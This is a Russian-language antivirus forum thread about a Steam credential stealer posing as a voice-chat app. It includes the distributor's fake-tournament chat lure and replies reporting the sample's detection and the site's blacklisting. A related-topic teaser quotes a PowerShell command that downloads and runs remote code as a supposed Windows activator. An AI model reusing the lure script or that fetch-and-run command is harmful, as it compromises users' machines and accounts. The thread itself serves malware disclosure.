Перейти к содержанию

Вирус. Не палится каспером.

subnull

От subnull
в Беседка

 Share

Рекомендуемые сообщения

subnull Новичок

subnull

Опубликовано
Опубликовано

Ребята создали неплохой, имхо, сайт.
Предлагают скачать неплохой спикер для связи в стиме, что на деле является обычным стилером. Базами каспера не палится. Обидно даже. VIRUSTOTAL: https://www.virustotal.com/ru/file/4c7d39f8876a5041a06ccb0b96011c7444fa4e2959015a5ca3424544f1f7f22d/analysis/

Собственно ссылка на человека-распостронителя, ссылка на сайт, вредоносный файл прикреплю. Диалог с сабжем в STEAM,
[удалено] сайт зловред.
http://steamcommunity.com/id/ildar200144/- сабж. (TRoll)

Диалог: 

 

16:22 - TRoll: Привет хочешь на турнир ? я смотрел твои некоторые игры ,ты вроде бы хорошо играешь,может ты с нами квалы пройдешь?
16:23 - TRoll: а то у нас 1 на море уехал(
16:23 - TRoll: замены нет
16:25 - TRoll: ты тут? когда будет время напиши ,ок? ты хорошо играешь ,хороший игрок)
23:07 - TRoll: привет,так что хочешь с нами на турнире поиграть?
22:06 - F0x3: Привет
22:06 - F0x3: ну, можно
23:08 - TRoll: кароч 25 июля будет
23:08 - TRoll: турнир
23:08 - TRoll: маленький конечно
23:08 - TRoll: 5к на всю тиму
22:07 - F0x3: Окей.
22:07 - F0x3: Что за турнир?
23:08 - TRoll: да так маленький говорю же
23:08 - TRoll: там 9 команд
23:09 - TRoll: ты вроде бы хорошо игарешь,у тебя есть спикеры?
22:07 - F0x3: Я тебя понял. Я должен внести что-то типо аванса\оплаты за учатие?
23:09 - TRoll: нет,
23:09 - TRoll: ничего не надо это фигня
23:09 - TRoll: там 250 за всю тиму
23:09 - TRoll: уже внесено
23:09 - TRoll: 1 друг уехал н море
22:08 - F0x3: Фантастика) Тогда я буду рад поучаствовать)
22:08 - F0x3: Думал очередной развод)
23:10 - TRoll: та не,спикеры есть?
22:09 - F0x3: Динамики?
23:10 - TRoll: прогарммы для разговора...
22:09 - F0x3: омг, так какая проблема выкачать?
22:09 - F0x3: скайп, facetime, TS
22:09 - F0x3: что нужно?
23:12 - TRoll: TS и скайп очень лагучие
23:12 - TRoll: и Рк тоже
23:12 - TRoll: вот нормальный спикер мы уже через него почти год сидим ниразу не подводил
23:12 - TRoll: ща погодь
23:13 - TRoll: [удалено], вот оффицальный сайт ,если что заходи в 23 комнату ,пороль FDGU8I
23:13 - TRoll: мы тут с Сережей сидим,он с нами играть будет
23:15 - TRoll: ты тут?
23:15 - TRoll: Fox3
23:15 - TRoll: так что?
22:14 - F0x3: 1 сек
23:16 - TRoll: жду
23:18 - TRoll: долго еще? мы тебя же ждём
22:18 - F0x3: подозрительный сайт
22:18 - F0x3: не особо доверяю ему
23:20 - TRoll: та вроде нормальный
22:18 - F0x3: +отзывов о нем никаких
23:20 - TRoll: ну не хочешь ,не верь но спикер хороший...
23:20 - TRoll: так нам тебя ждать или ты пас?
22:19 - F0x3: ну сейчас в песочнице запущу
22:20 - F0x3: ибо хз что это
23:21 - TRoll: ок
22:20 - F0x3: и на компе запускать это не очень хочется
23:24 - TRoll: и?
22:23 - F0x3: найс
22:23 - F0x3: чем криптовал?
22:23 - TRoll сейчас имеет статус «Не в сети».
22:23 - F0x3: Trojan.PWS.Steam.2902

PS Не знаю промахнулся ли я тредом или нет, но я сделал свое дело. Если промахнулся - перекиньте куда надо, пожалуйста. Всем спасибо, мир.
  • Спасибо (+1) 1
  • Улыбнуло 1
  • Согласен 2
Ссылка на комментарий
Поделиться на другие сайты
subnull Новичок

subnull

Опубликовано
  • Автор
Опубликовано

Инфо

Тема переехала из раздела Е.К.

 

Тушка отправится в вирлаб

Оперативно, сяп) А то просто как-то странно, чтобы что-то не детектировалось каспером. Я в этом не разбираюсь особо(что касается детектирования зловредов разными антивирусами), но имхо каспер лучший =3

Ссылка на комментарий
Поделиться на другие сайты
Friend Корифей

Friend

Опубликовано
Опубликовано

Сайт тоже бы в черный список отправить, так как саму программу они (вирусописатели) могут переупаковать и антивирусы ее не будут детектировать по базам.

  • Согласен 6
Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Спустя почти двое суток (видимо, гневное послание сегодня сработало :))

В присланном Вами файле обнаружено новое вредоносное программное обеспечение. 
 
Cplace_0.84.exe_        -       Trojan-GameThief.MSIL.Staem.ail 
 
Его детектирование будет включено в очередное обновление антивирусных баз. 
Благодарим за оказанную помощь.

 

 

Ссылку тоже занесли в черный список

  • Спасибо (+1) 1
  • Улыбнуло 1
  • Согласен 2
Ссылка на комментарий
Поделиться на другие сайты
Гарри Опытный

Гарри

Опубликовано
Опубликовано

По детектам VT на эту тушку, то вчера, сразу после добавления, 6 из 55 ругались, потом 22 из 55. Сегодня днем 15 из 55,а вечером 27 из 55

 

http://whitelist.kaspersky.com/advisor?lang=ru-Ru#search/5af6ff34189d55503e7cd0275acfa6e7

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • fertune
      Вирус dialer.exe
      От fertune
      Когда открываешь диспетчер задач то сначала ЦП грузит на 100% а потом на 10% я посмотрел через dr.web cureit и увидел то что это майнер dialer.exe, смотрел в интернете как пофиксить но никакие способы не помогли(может быть я что то делал неправильно)
      можете помочь с проблемой? Еще я пробовал его фиксить удаляя его но он опять появлялся и грузил ЦП на все 100%.
       
    • Temikst
      Поймал какой-то вирус
      От Temikst
      Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
      CollectionLog-2025.02.09-23.46.zip

       
      Даже браузер сильно тормозит. после открывание диспетчер задач сразу же лучше работает\
    • VanyeJ
      Вирус в PowerShell
      От VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
×
×
  • Создать...